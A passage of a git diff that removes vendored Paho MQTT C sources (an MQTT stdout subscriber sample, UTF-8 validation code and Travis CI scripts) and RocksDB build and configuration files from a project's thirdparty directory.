- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Ian Craggs - change delimiter option from char to string
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
-/*
-
- stdout subscriber
-
- compulsory parameters:
-
-  --topic topic to subscribe to
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 2
-	--delimiter \n
-	--clientid stdout-subscriber
-	--showtopics off
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-#include "MQTTClient.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-
-#if defined(WIN32)
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#endif
-
-
-volatile int toStop = 0;
-
-
-struct opts_struct
-{
-	char* clientid;
-	int nodelimiter;
-	char* delimiter;
-	int qos;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int showtopics;
-	int keepalive;
-} opts =
-{
-	"stdout-subscriber", 0, "\n", 2, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdout subscriber\n");
-	printf("Usage: stdoutsub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --delimiter <delim> (default is \\n)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --showtopics <on or off> (default is on if the topic has a wildcard, else off)\n");
-	printf("  --keepalive <seconds> (default is %d seconds)\n", opts.keepalive);
-	exit(EXIT_FAILURE);
-}
-
-
-void myconnect(MQTTClient* client, MQTTClient_connectOptions* opts)
-{
-	int rc = 0;
-	if ((rc = MQTTClient_connect(*client, opts)) != 0)
-	{
-		printf("Failed to connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-void getopts(int argc, char** argv);
-
-int main(int argc, char** argv)
-{
-	MQTTClient client;
-	MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-	char* topic = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	topic = argv[1];
-
-	if (strchr(topic, '#') || strchr(topic, '+'))
-		opts.showtopics = 1;
-	if (opts.showtopics)
-		printf("topic is %s\n", topic);
-
-	getopts(argc, argv);
-	sprintf(url, "%s:%s", opts.host, opts.port);
-
-	rc = MQTTClient_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.reliable = 0;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-
-	myconnect(&client, &conn_opts);
-
-	rc = MQTTClient_subscribe(client, topic, opts.qos);
-
-	while (!toStop)
-	{
-		char* topicName = NULL;
-		int topicLen;
-		MQTTClient_message* message = NULL;
-
-		rc = MQTTClient_receive(client, &topicName, &topicLen, &message, 1000);
-		if (message)
-		{
-			if (opts.showtopics)
-				printf("%s\t", topicName);
-			if (opts.nodelimiter)
-				printf("%.*s", message->payloadlen, (char*)message->payload);
-			else
-				printf("%.*s%s", message->payloadlen, (char*)message->payload, opts.delimiter);
-			fflush(stdout);
-			MQTTClient_freeMessage(&message);
-			MQTTClient_free(topicName);
-		}
-		if (rc != 0)
-			myconnect(&client, &conn_opts);
-	}
-
-	printf("Stopping\n");
-
-	MQTTClient_disconnect(client, 0);
-
-	MQTTClient_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				opts.nodelimiter = 1;
-		}
-		else if (strcmp(argv[count], "--showtopics") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "on") == 0)
-					opts.showtopics = 1;
-				else if (strcmp(argv[count], "off") == 0)
-					opts.showtopics = 0;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/utf-8.c b/thirdparty/paho.mqtt.c/src/utf-8.c
deleted file mode 100644
index 1530701..0000000
--- a/thirdparty/paho.mqtt.c/src/utf-8.c
+++ /dev/null
@@ -1,230 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-
-/**
- * @file
- * \brief Functions for checking that strings contain UTF-8 characters only
- *
- * See page 104 of the Unicode Standard 5.0 for the list of well formed
- * UTF-8 byte sequences.
- * 
- */
-#include "utf-8.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "StackTrace.h"
-
-/**
- * Macro to determine the number of elements in a single-dimension array
- */
-#if !defined(ARRAY_SIZE)
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-
-/**
- * Structure to hold the valid ranges of UTF-8 characters, for each byte up to 4
- */
-struct
-{
-	int len; /**< number of elements in the following array (1 to 4) */
-	struct
-	{
-		char lower; /**< lower limit of valid range */
-		char upper; /**< upper limit of valid range */
-	} bytes[4];   /**< up to 4 bytes can be used per character */
-}
-valid_ranges[] = 
-{
-		{1, { {00, 0x7F} } },
-		{2, { {0xC2, 0xDF}, {0x80, 0xBF} } },
-		{3, { {0xE0, 0xE0}, {0xA0, 0xBF}, {0x80, 0xBF} } },
-		{3, { {0xE1, 0xEC}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{3, { {0xED, 0xED}, {0x80, 0x9F}, {0x80, 0xBF} } },
-		{3, { {0xEE, 0xEF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF0, 0xF0}, {0x90, 0xBF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF1, 0xF3}, {0x80, 0xBF}, {0x80, 0xBF}, {0x80, 0xBF} } },
-		{4, { {0xF4, 0xF4}, {0x80, 0x8F}, {0x80, 0xBF}, {0x80, 0xBF} } },
-};
-
-
-static const char* UTF8_char_validate(int len, const char* data);
-
-
-/**
- * Validate a single UTF-8 character
- * @param len the length of the string in "data"
- * @param data the bytes to check for a valid UTF-8 char
- * @return pointer to the start of the next UTF-8 character in "data"
- */
-static const char* UTF8_char_validate(int len, const char* data)
-{
-	int good = 0;
-	int charlen = 2;
-	int i, j;
-	const char *rc = NULL;
-
-	FUNC_ENTRY;
-	/* first work out how many bytes this char is encoded in */
-	if ((data[0] & 128) == 0)
-		charlen = 1;
-	else if ((data[0] & 0xF0) == 0xF0)
-		charlen = 4;
-	else if ((data[0] & 0xE0) == 0xE0)
-		charlen = 3;
-
-	if (charlen > len)
-		goto exit;	/* not enough characters in the string we were given */
-
-	for (i = 0; i < ARRAY_SIZE(valid_ranges); ++i)
-	{ /* just has to match one of these rows */
-		if (valid_ranges[i].len == charlen)
-		{
-			good = 1;
-			for (j = 0; j < charlen; ++j)
-			{
-				if (data[j] < valid_ranges[i].bytes[j].lower ||
-						data[j] > valid_ranges[i].bytes[j].upper)
-				{
-					good = 0;  /* failed the check */
-					break;
-				}
-			}
-			if (good)
-				break;
-		}
-	}
-
-	if (good)
-		rc = data + charlen;
-	exit:
-	FUNC_EXIT;
-	return rc;
-}
-
-
-/**
- * Validate a length-delimited string has only UTF-8 characters
- * @param len the length of the string in "data"
- * @param data the bytes to check for valid UTF-8 characters
- * @return 1 (true) if the string has only UTF-8 characters, 0 (false) otherwise
- */
-int UTF8_validate(int len, const char* data)
-{
-	const char* curdata = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (len == 0)
-	{
-		rc = 1;
-		goto exit;
-	}
-	curdata = UTF8_char_validate(len, data);
-	while (curdata && (curdata < data + len))
-		curdata = UTF8_char_validate(len, curdata);
-
-	rc = curdata != NULL;
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Validate a null-terminated string has only UTF-8 characters
- * @param string the string to check for valid UTF-8 characters
- * @return 1 (true) if the string has only UTF-8 characters, 0 (false) otherwise
- */
-int UTF8_validateString(const char* string)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = UTF8_validate((int)strlen(string), string);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-#if defined(UNIT_TESTS)
-#include <stdio.h>
-
-typedef struct
-{
-	int len;
-	char data[20];
-} tests;
-
-tests valid_strings[] =
-{
-		{3, "hjk" },
-		{7, {0x41, 0xE2, 0x89, 0xA2, 0xCE, 0x91, 0x2E} },
-		{3, {'f', 0xC9, 0xB1 } },
-		{9, {0xED, 0x95, 0x9C, 0xEA, 0xB5, 0xAD, 0xEC, 0x96, 0xB4} },
-		{9, {0xE6, 0x97, 0xA5, 0xE6, 0x9C, 0xAC, 0xE8, 0xAA, 0x9E} },
-		{4, {0x2F, 0x2E, 0x2E, 0x2F} },
-		{7, {0xEF, 0xBB, 0xBF, 0xF0, 0xA3, 0x8E, 0xB4} },
-};
-
-tests invalid_strings[] =
-{
-		{2, {0xC0, 0x80} },
-		{5, {0x2F, 0xC0, 0xAE, 0x2E, 0x2F} },
-		{6, {0xED, 0xA1, 0x8C, 0xED, 0xBE, 0xB4} },
-		{1, {0xF4} },
-};
-
-int main (int argc, char *argv[])
-{
-	int i, failed = 0;
-
-	for (i = 0; i < ARRAY_SIZE(valid_strings); ++i)
-	{
-		if (!UTF8_validate(valid_strings[i].len, valid_strings[i].data))
-		{
-			printf("valid test %d failed\n", i);
-			failed = 1;
-		}
-		else
-			printf("valid test %d passed\n", i);
-	}
-
-	for (i = 0; i < ARRAY_SIZE(invalid_strings); ++i)
-	{
-		if (UTF8_validate(invalid_strings[i].len, invalid_strings[i].data))
-		{
-			printf("invalid test %d failed\n", i);
-			failed = 1;
-		}
-		else
-			printf("invalid test %d passed\n", i);
-	}
-
-	if (failed)
-		printf("Failed\n");
-	else
-		printf("Passed\n");
-
-	return 0;
-} /* End of main function*/
-
-#endif
-
diff --git a/thirdparty/paho.mqtt.c/src/utf-8.h b/thirdparty/paho.mqtt.c/src/utf-8.h
deleted file mode 100644
index 8bce4b3..0000000
--- a/thirdparty/paho.mqtt.c/src/utf-8.h
+++ /dev/null
@@ -1,23 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#if !defined(UTF8_H)
-#define UTF8_H
-
-int UTF8_validate(int len, const char *data);
-int UTF8_validateString(const char* string);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/travis-build.sh b/thirdparty/paho.mqtt.c/travis-build.sh
deleted file mode 100755
index 5356f8b..0000000
--- a/thirdparty/paho.mqtt.c/travis-build.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/bash
-
-set -e
-
-rm -rf build.paho
-mkdir build.paho
-cd build.paho
-echo "travis build dir $TRAVIS_BUILD_DIR pwd $PWD"
-cmake -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=FALSE -DPAHO_BUILD_SAMPLES=TRUE ..
-make
-python ../test/mqttsas2.py &
-ctest -VV --timeout 600
-kill %1
-killall mosquitto
-
diff --git a/thirdparty/paho.mqtt.c/travis-env-vars b/thirdparty/paho.mqtt.c/travis-env-vars
deleted file mode 100644
index 2551ccb..0000000
--- a/thirdparty/paho.mqtt.c/travis-env-vars
+++ /dev/null
@@ -1,2 +0,0 @@
-export TRAVIS_OS_NAME=linux
-export TRAVIS_BUILD_DIR=$PWD
diff --git a/thirdparty/paho.mqtt.c/travis-install.sh b/thirdparty/paho.mqtt.c/travis-install.sh
deleted file mode 100755
index 0405da6..0000000
--- a/thirdparty/paho.mqtt.c/travis-install.sh
+++ /dev/null
@@ -1,18 +0,0 @@
-#!/bin/bash
-
-if [ "$TRAVIS_OS_NAME" == "linux" ]; then
-	pwd
-	sudo service mosquitto stop
-	# Stop any mosquitto instance which may be still running from previous runs
-	killall mosquitto
-	mosquitto -h
-	mosquitto -c test/tls-testing/mosquitto.conf &
-fi
-
-if [ "$TRAVIS_OS_NAME" == "osx" ]; then
-	pwd
-	brew update
-	brew install openssl mosquitto
-	brew services stop mosquitto
-	/usr/local/sbin/mosquitto -c test/tls-testing/mosquitto.conf &
-fi
diff --git a/thirdparty/paho.mqtt.c/travis-macos-vars b/thirdparty/paho.mqtt.c/travis-macos-vars
deleted file mode 100644
index bbdbccb..0000000
--- a/thirdparty/paho.mqtt.c/travis-macos-vars
+++ /dev/null
@@ -1,2 +0,0 @@
-export TRAVIS_OS_NAME=osx
-export TRAVIS_BUILD_DIR=$PWD
diff --git a/thirdparty/rocksdb/.clang-format b/thirdparty/rocksdb/.clang-format
deleted file mode 100644
index 7c27981..0000000
--- a/thirdparty/rocksdb/.clang-format
+++ /dev/null
@@ -1,5 +0,0 @@
-# Complete list of style options can be found at: 
-# http://clang.llvm.org/docs/ClangFormatStyleOptions.html
----
-BasedOnStyle: Google
-...
diff --git a/thirdparty/rocksdb/.gitignore b/thirdparty/rocksdb/.gitignore
deleted file mode 100644
index 03b8059..0000000
--- a/thirdparty/rocksdb/.gitignore
+++ /dev/null
@@ -1,74 +0,0 @@
-make_config.mk
-
-*.a
-*.arc
-*.d
-*.dylib*
-*.gcda
-*.gcno
-*.o
-*.so
-*.so.*
-*_test
-*_bench
-*_stress
-*.out
-*.class
-*.jar
-*.*jnilib*
-*.d-e
-*.o-*
-*.swp
-*~
-*.vcxproj
-*.vcxproj.filters
-*.sln
-*.cmake
-CMakeCache.txt
-CMakeFiles/
-build/
-
-ldb
-manifest_dump
-sst_dump
-blob_dump
-column_aware_encoding_exp
-util/build_version.cc
-build_tools/VALGRIND_LOGS/
-coverage/COVERAGE_REPORT
-.gdbhistory
-.gdb_history
-package/
-unity.a
-tags
-etags
-rocksdb_dump
-rocksdb_undump
-db_test2
-
-java/out
-java/target
-java/test-libs
-java/*.log
-java/include/org_rocksdb_*.h
-
-.idea/
-*.iml
-
-rocksdb.cc
-rocksdb.h
-unity.cc
-java/crossbuild/.vagrant
-.vagrant/
-java/**/*.asc
-java/javadoc
-
-scan_build_report/
-t
-LOG
-
-db_logs/
-tp2/
-fbcode/
-fbcode
-buckifier/*.pyc
diff --git a/thirdparty/rocksdb/.travis.yml b/thirdparty/rocksdb/.travis.yml
deleted file mode 100644
index b76973d..0000000
--- a/thirdparty/rocksdb/.travis.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-sudo: false
-dist: trusty
-language: cpp
-os:
-  - linux
-  - osx
-compiler:
-  - clang
-  - gcc
-osx_image: xcode8.3
-jdk:
-  - oraclejdk7
-cache:
-  - ccache
-  - apt
-
-addons:
-   apt:
-      packages: ['zlib1g-dev', 'libbz2-dev', 'libsnappy-dev', 'curl', 'libgflags-dev', 'mingw-w64']
-env:
-  - TEST_GROUP=platform_dependent # 16-18 minutes
-  - TEST_GROUP=1 # 33-35 minutes
-  - TEST_GROUP=2 # 30-32 minutes
-  # Run java tests
-  - JOB_NAME=java_test # 4-11 minutes
-  # Build ROCKSDB_LITE
-  - JOB_NAME=lite_build # 3-4 minutes
-  # Build examples
-  - JOB_NAME=examples # 5-7 minutes
-  - JOB_NAME=cmake # 3-5 minutes
-  - JOB_NAME=cmake-mingw # 3 minutes
-
-matrix:
-  exclude:
-  - os: osx
-    env: TEST_GROUP=1
-  - os: osx
-    env: TEST_GROUP=2
-  - os : osx
-    env: JOB_NAME=cmake-mingw
-  - os : linux
-    compiler: clang
-  - os : osx
-    compiler: gcc
-
-# https://docs.travis-ci.com/user/caching/#ccache-cache
-install:
-  - if [ "${TRAVIS_OS_NAME}" == osx ]; then
-      brew install ccache;
-      PATH=$PATH:/usr/local/opt/ccache/libexec;
-    fi
-
-before_script:
-  # Increase the maximum number of open file descriptors, since some tests use
-  # more FDs than the default limit.
-  - ulimit -n 8192
-
-script:
-  - ${CXX} --version
-  - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 all_but_some_tests check_some; fi
-  - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi
-  - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi
-  - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi
-  - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib tools; fi
-  - if [ "${JOB_NAME}" == 'examples' ]; then OPT=-DTRAVIS V=1 make -j4 static_lib; cd examples; make -j4; fi
-  - if [ "${JOB_NAME}" == 'cmake' ]; then mkdir build && cd build && cmake .. && make -j4 rocksdb; fi
-  - if [ "${JOB_NAME}" == 'cmake-mingw' ]; then mkdir build && cd build && cmake .. -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DCMAKE_SYSTEM_NAME=Windows && make -j4 rocksdb; fi
-notifications:
-    email:
-      - leveldb@fb.com
-    webhooks:
-      - https://buildtimetrend.herokuapp.com/travis
diff --git a/thirdparty/rocksdb/AUTHORS b/thirdparty/rocksdb/AUTHORS
deleted file mode 100644
index e644f55..0000000
--- a/thirdparty/rocksdb/AUTHORS
+++ /dev/null
@@ -1,11 +0,0 @@
-Facebook Inc.
-Facebook Engineering Team
-
-Google Inc.
-# Initial version authors:
-Jeffrey Dean <jeff@google.com>
-Sanjay Ghemawat <sanjay@google.com>
-
-# Partial list of contributors:
-Kevin Regan <kevin.d.regan@gmail.com>
-Johan Bilien <jobi@litl.com>
diff --git a/thirdparty/rocksdb/CMakeLists.txt b/thirdparty/rocksdb/CMakeLists.txt
deleted file mode 100644
index 4b1481c..0000000
--- a/thirdparty/rocksdb/CMakeLists.txt
+++ /dev/null
@@ -1,908 +0,0 @@
-# Prerequisites for Windows:
-#     This cmake build is for Windows 64-bit only.
-#
-# Prerequisites:
-#     You must have at least Visual Studio 2015 Update 3. Start the Developer Command Prompt window that is a part of Visual Studio installation.
-#     Run the build commands from within the Developer Command Prompt window to have paths to the compiler and runtime libraries set.
-#     You must have git.exe in your %PATH% environment variable.
-#
-# To build Rocksdb for Windows is as easy as 1-2-3-4-5:
-#
-# 1. Update paths to third-party libraries in thirdparty.inc file
-# 2. Create a new directory for build artifacts
-#        mkdir build
-#        cd build
-# 3. Run cmake to generate project files for Windows, add more options to enable required third-party libraries.
-#    See thirdparty.inc for more information.
-#        sample command: cmake -G "Visual Studio 14 Win64" -DGFLAGS=1 -DSNAPPY=1 -DJEMALLOC=1 -DJNI=1 ..
-# 4. Then build the project in debug mode (you may want to add /m[:<N>] flag to run msbuild in <N> parallel threads
-#                                          or simply /m ot use all avail cores)
-#        msbuild rocksdb.sln
-#
-#        rocksdb.sln build features exclusions of test only code in Release. If you build ALL_BUILD then everything
-#        will be attempted but test only code does not build in Release mode.
-#
-# 5. And release mode (/m[:<N>] is also supported)
-#        msbuild rocksdb.sln /p:Configuration=Release
-#
-# Linux:
-#
-# 1. Install a recent toolchain such as devtoolset-3 if you're on a older distro. C++11 required.
-# 2. mkdir build; cd build
-# 3. cmake ..
-# 4. make -j
-
-cmake_minimum_required(VERSION 2.6)
-project(rocksdb)
-
-if(POLICY CMP0042)
-  cmake_policy(SET CMP0042 NEW)
-endif()
-
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules/")
-
-option(WITH_JEMALLOC "build with JeMalloc" OFF)
-if(MSVC)
-  include(${CMAKE_CURRENT_SOURCE_DIR}/thirdparty.inc)
-else()
-  if(CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-    # FreeBSD has jemaloc as default malloc
-    # but it does not have all the jemalloc files in include/...
-    set(WITH_JEMALLOC ON)
-  else()
-    if(WITH_JEMALLOC)
-      find_package(JeMalloc REQUIRED)
-      add_definitions(-DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE)
-      include_directories(${JEMALLOC_INCLUDE_DIR})
-    endif()
-  endif()
-
-  option(WITH_SNAPPY "build with SNAPPY" OFF)
-  if(WITH_SNAPPY)
-    find_package(snappy REQUIRED)
-    add_definitions(-DSNAPPY)
-    include_directories(${SNAPPY_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${SNAPPY_LIBRARIES})
-  endif()
-
-  option(WITH_ZLIB "build with zlib" OFF)
-  if(WITH_ZLIB)
-    find_package(zlib REQUIRED)
-    add_definitions(-DZLIB)
-    include_directories(${ZLIB_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${ZLIB_LIBRARIES})
-  endif()
-
-  option(WITH_BZ2 "build with bzip2" OFF)
-  if(WITH_BZ2)
-    find_package(bzip2 REQUIRED)
-    add_definitions(-DBZIP2)
-    include_directories(${BZIP2_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${BZIP2_LIBRARIES})
-  endif()
-
-  option(WITH_LZ4 "build with lz4" OFF)
-  if(WITH_LZ4)
-    find_package(lz4 REQUIRED)
-    add_definitions(-DLZ4)
-    include_directories(${LZ4_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${LZ4_LIBRARIES})
-  endif()
-
-  option(WITH_ZSTD "build with zstd" OFF)
-  if(WITH_ZSTD)
-    find_package(zstd REQUIRED)
-    add_definitions(-DZSTD)
-    include_directories(${ZSTD_INCLUDE_DIR})
-    list(APPEND THIRDPARTY_LIBS ${ZSTD_LIBRARIES})
-  endif()
-endif()
-
-if(WIN32)
-  execute_process(COMMAND powershell -noprofile -Command "Get-Date -format MM_dd_yyyy" OUTPUT_VARIABLE DATE)
-  execute_process(COMMAND powershell -noprofile -Command "Get-Date -format HH:mm:ss" OUTPUT_VARIABLE TIME)
-  string(REGEX REPLACE "(..)_(..)_..(..).*" "\\1/\\2/\\3" DATE "${DATE}")
-  string(REGEX REPLACE "(..):(.....).*" " \\1:\\2" TIME "${TIME}")
-  set(GIT_DATE_TIME "${DATE} ${TIME}")
-else()
-  execute_process(COMMAND date "+%Y/%m/%d %H:%M:%S" OUTPUT_VARIABLE DATETIME)
-  string(REGEX REPLACE "\n" "" DATETIME ${DATETIME})
-  set(GIT_DATE_TIME "${DATETIME}")
-endif()
-
-find_package(Git)
-
-if(GIT_FOUND AND EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/.git")
-  if(WIN32)
-    execute_process(COMMAND $ENV{COMSPEC} /C ${GIT_EXECUTABLE} -C ${CMAKE_CURRENT_SOURCE_DIR} rev-parse HEAD OUTPUT_VARIABLE GIT_SHA)
-  else()
-    execute_process(COMMAND ${GIT_EXECUTABLE} -C ${CMAKE_CURRENT_SOURCE_DIR} rev-parse HEAD OUTPUT_VARIABLE GIT_SHA)
-  endif()
-else()
-  set(GIT_SHA 0)
-endif()
-
-string(REGEX REPLACE "[^0-9a-f]+" "" GIT_SHA "${GIT_SHA}")
-
-if(NOT WIN32)
-  execute_process(COMMAND
-      "./build_tools/version.sh" "full"
-      WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}
-      OUTPUT_VARIABLE ROCKSDB_VERSION
-  )
-  string(STRIP "${ROCKSDB_VERSION}" ROCKSDB_VERSION)
-  execute_process(COMMAND
-      "./build_tools/version.sh" "major"
-      WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}
-      OUTPUT_VARIABLE ROCKSDB_VERSION_MAJOR
-  )
-  string(STRIP "${ROCKSDB_VERSION_MAJOR}" ROCKSDB_VERSION_MAJOR)
-endif()
-
-option(WITH_MD_LIBRARY "build with MD" ON)
-if(WIN32 AND MSVC)
-  if(WITH_MD_LIBRARY)
-    set(RUNTIME_LIBRARY "MD")
-  else()
-    set(RUNTIME_LIBRARY "MT")
-  endif()
-endif()
-
-set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc)
-configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY)
-add_library(build_version OBJECT ${BUILD_VERSION_CC})
-target_include_directories(build_version PRIVATE
-  ${CMAKE_CURRENT_SOURCE_DIR}/util)
-if(MSVC)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351")
-else()
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers")
-  if(MINGW)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format")
-  endif()
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11")
-  if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug")
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer")
-    include(CheckCXXCompilerFlag)
-    CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER)
-    if(HAVE_OMIT_LEAF_FRAME_POINTER)
-      set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer")
-    endif()
-  endif()
-endif()
-
-option(PORTABLE "build a portable binary" OFF)
-option(FORCE_SSE42 "force building with SSE4.2, even when PORTABLE=ON" OFF)
-if(PORTABLE)
-  # MSVC does not need a separate compiler flag to enable SSE4.2; if nmmintrin.h
-  # is available, it is available by default.
-  if(FORCE_SSE42 AND NOT MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -msse4.2")
-  endif()
-else()
-  if(MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /arch:AVX2")
-  else()
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -march=native")
-  endif()
-endif()
-
-set(CMAKE_REQUIRED_FLAGS ${CMAKE_CXX_FLAGS})
-include(CheckCXXSourceCompiles)
-CHECK_CXX_SOURCE_COMPILES("
-#include <cstdint>
-#include <nmmintrin.h>
-int main() {
-  volatile uint32_t x = _mm_crc32_u32(0, 0);
-}
-" HAVE_SSE42)
-if(HAVE_SSE42)
-  add_definitions(-DHAVE_SSE42)
-elseif(FORCE_SSE42)
-  message(FATAL_ERROR "FORCE_SSE42=ON but unable to compile with SSE4.2 enabled")
-endif()
-
-CHECK_CXX_SOURCE_COMPILES("
-#if defined(_MSC_VER) && !defined(__thread)
-#define __thread __declspec(thread)
-#endif
-int main() {
-  static __thread int tls;
-}
-" HAVE_THREAD_LOCAL)
-if(HAVE_THREAD_LOCAL)
-  add_definitions(-DROCKSDB_SUPPORT_THREAD_LOCAL)
-endif()
